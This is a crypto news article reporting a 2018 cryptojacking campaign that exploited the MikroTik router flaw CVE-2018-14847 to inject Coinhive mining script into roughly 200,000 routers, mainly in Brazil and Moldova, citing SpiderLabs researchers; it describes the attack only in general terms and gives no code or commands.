X

12539 Views

This Cryptojacking Campaign Infected Over 200.00 Mikrotik Routers

Spread the love
  • 5
    Shares

A cryptojacking infected more than 200.00 Mikrotik routers which failed to solve the vulnerability issue of the system four months after security error for MikroTik routers was launched.

Security error CVE-2018-14847 identified within MikroTik routers was used by illegal crypto miners to install Coinhive encoding on platforms visited by users. It was found that initially, hackers infected thousands of routers in Brazil, as reported by SpiderLabs, a security research company.

Our researcher @Simon_Kenin has discovered a massive #IoT #cryptojacking campaign affecting tens of thousands of unpatched @mikrotik_com routers in Brazil and going global. Read more here”

The high exposure rate in MikroTik Ethernet and Wi-Fi routers allowed hackers to omit the authentication step and enter the system, managing to quickly gain control over it. This attack was identified back in April, and as a result, the router maker launched a security patch.

It all started in Brazil

The researchers found that the Coinhive script was first introduced in 175,000 routers based in Brazil. With the installation of the second site key, it infected an additional number of 25,000 routers in the Republic of Moldova, reported researcher Troy Mursch.

The infection has spread rapidly on all websites visited by users. In order not to be identified, the hacker limited to installing the crypto mining script only in error breaks. Furthermore, the hacker removed any trace from the router system after it was compromised.

The cryptojacking targets especially MikroTik routers identified in Brazil. It is assumed that a large number of routers were not reviewed after the security issue was solved four months ago, meaning that these routers are subjected to a major risk of being attacked again.

There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Simon Kenin, a security researcher at SpiderLabs reported.

5 Shares

You may be interested

Spain May Soon Require Investors to Reveal Their Crypto Holdings
News
129 views
News
129 views

Spain May Soon Require Investors to Reveal Their Crypto Holdings

Solomon Magawi - October 23, 2018

As Bloomberg reported recently, the Spanish government proposed a controversial bill that would require cryptocurrency investors to disclose their holdings.…

The US Government Seized Over $700,000 Worth of Cryptos from a Dark Web Drug Dealer
News
170 views
News
170 views

The US Government Seized Over $700,000 Worth of Cryptos from a Dark Web Drug Dealer

Joshua Tayo - October 23, 2018

Oxymonster, a dark web drug dealer who specialize in the sales of Grade drugs has been sentenced to 20-year in…

Cold Wallet vs Hot Wallet: What’s The Difference?
Learn
1025 views
Learn
1025 views

Cold Wallet vs Hot Wallet: What’s The Difference?

Anca Faget - October 23, 2018

Wallets are software programs and devices which store the private and public keys of Bitcoins and other cryptocurrencies. There are…